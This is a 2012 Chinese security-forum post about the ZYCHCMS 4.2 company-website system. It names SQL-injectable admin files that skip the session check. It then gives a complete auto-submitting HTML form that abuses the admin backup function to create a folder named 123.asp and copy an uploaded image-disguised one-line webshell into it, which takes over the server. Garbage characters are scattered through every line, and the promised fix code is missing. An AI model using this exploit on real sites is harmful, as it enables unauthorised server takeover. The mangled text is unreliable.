找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2060|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 @0 z0 T+ f- M8 j: z8 Q" Z3 l# v. |

* m4 @: Y1 E7 p9 D/ f+ _' C6 c( e+ }. Q6 f/ ]6 p  M3 l6 V
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)4 g7 \% \* r) u* n6 j6 k, H* {( ~
①SQL注射漏洞4 e8 Z7 |0 C; ^
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp  `) n- s, U4 d- |; a; X& ^& ^9 ]
漏洞原因:未过滤0 D1 j$ g, h0 h+ e3 Y
漏洞代码:
5 ]( W9 B; \1 k" } 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。1 W% G  I- ~$ n' H$ \4 [
修复方法:在文件开头加入代码
2 E6 h' U: P0 _* M: N! e
4 Z6 B! d* v8 o, Y
( l& O& o6 |. _( |2 j$ P5 {* ~, {②后台拿WBSHELL6 b4 x1 P$ |9 y6 K
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。: B1 ?: L( m4 g& u5 d$ c8 `! d  e9 n4 z
这里在网上找了一个,改了下,将就着用。! e9 j5 F& W8 j7 y; l! V; l* ~
以下是代码本地提交代码
& b6 z3 R' H  T) |3 O% \+ o$ I6 j/ b! Y
8 s, S6 q7 o/ P; k% M* V7 `$ n  [# l
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
% D6 c6 f; f, b! C& D0 | <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
6 ^7 S$ z$ r) T; w <tr>
6 x8 \1 ^* r3 l( W3 | <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
5 X, ^, ]+ e% l </tr>& M  L! N# _3 r
<tr>0 J" R. L8 ]! b
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>, K4 t2 h+ |% T; y8 S
</span>8 m- ^1 ~, c7 n4 B& A, z1 d
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
) w* j$ i: ]% R7 o/ _2 u6 Y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >1 E# I6 V; E' j, V) ^1 K! g
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
/ d- i- ^: Z# Y, B4 { <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d- F3 X# ^* Y& z* I2 a
<div align=”left”>' Z; X" @2 ?* z( v2 N
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />1 B' n  d* J9 b$ i4 |7 x% {+ S3 f
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>+ G- D7 w1 ]. R6 H, C' f
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />- O8 G# u  @. k
</div></td>
. }" B7 |& Z5 e8 c3 {( h2 B </tr>" U  E7 a; `4 j& r: z/ Z- S) e: m
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>1 ?3 ^4 S5 N, {- h& r
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>! F$ Q0 F+ Y3 O& r
<td class=”td”><div align=”left”>
% D7 v" }/ _& h <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” /># ], z( _9 Z* t4 Z+ L
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
4 e5 W, W/ ?' p* y. ^  v, B8 O5 i </tr>
+ \# D2 D. R3 x2 j7 @3 G1 ^+ F <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
, g. r+ {: Z7 q: s6 l3 U: z <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
! g2 s4 E$ y# i& Y <td class=”td”><div align=”left”>/ v# ?% U1 t6 w" [/ ]# b
<input type=”submit” value=”确定备份” class=”btn”
  f/ {8 b) W& u% Z4 L% E* C/ A </div></td>
' \3 A/ m* U! B, o8 D& L </tr>7 N3 b9 H- k) `5 j
</table></td></tr></form>5 \9 L9 z- \7 o9 K6 c' t$ T
</table>/ l% l5 `  u9 c) C( ~
</td>8 u6 U) D' v: R2 m
</tr>$ \2 E% K, ?/ l+ F, {! L* E6 S' Z
</table>
! R, k4 }, l3 |  X2 _) q5 R1 Q <script>
" \4 `6 x6 E1 I4 ] document.all.add.submit();- U' ?$ `! `0 w0 F( c! ^' M  c' P
</script>% k7 g$ o' t7 @) `
% R6 |' z1 E; e9 ]2 B( K

, u8 f0 A6 j1 }+ R$ H9 ?1 c% O

" c  m1 T0 S6 L. O+ Z. f5 k- C6 @% K& N
" J2 [- l" n6 B# X. K  K
9 y  A0 F0 l9 i' G# E
4 K: Q+ j) I: u% F( u
) g, O. q! Z8 p& ~2 e! l% B, {
; J8 o8 r! }  U9 Z4 S0 k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表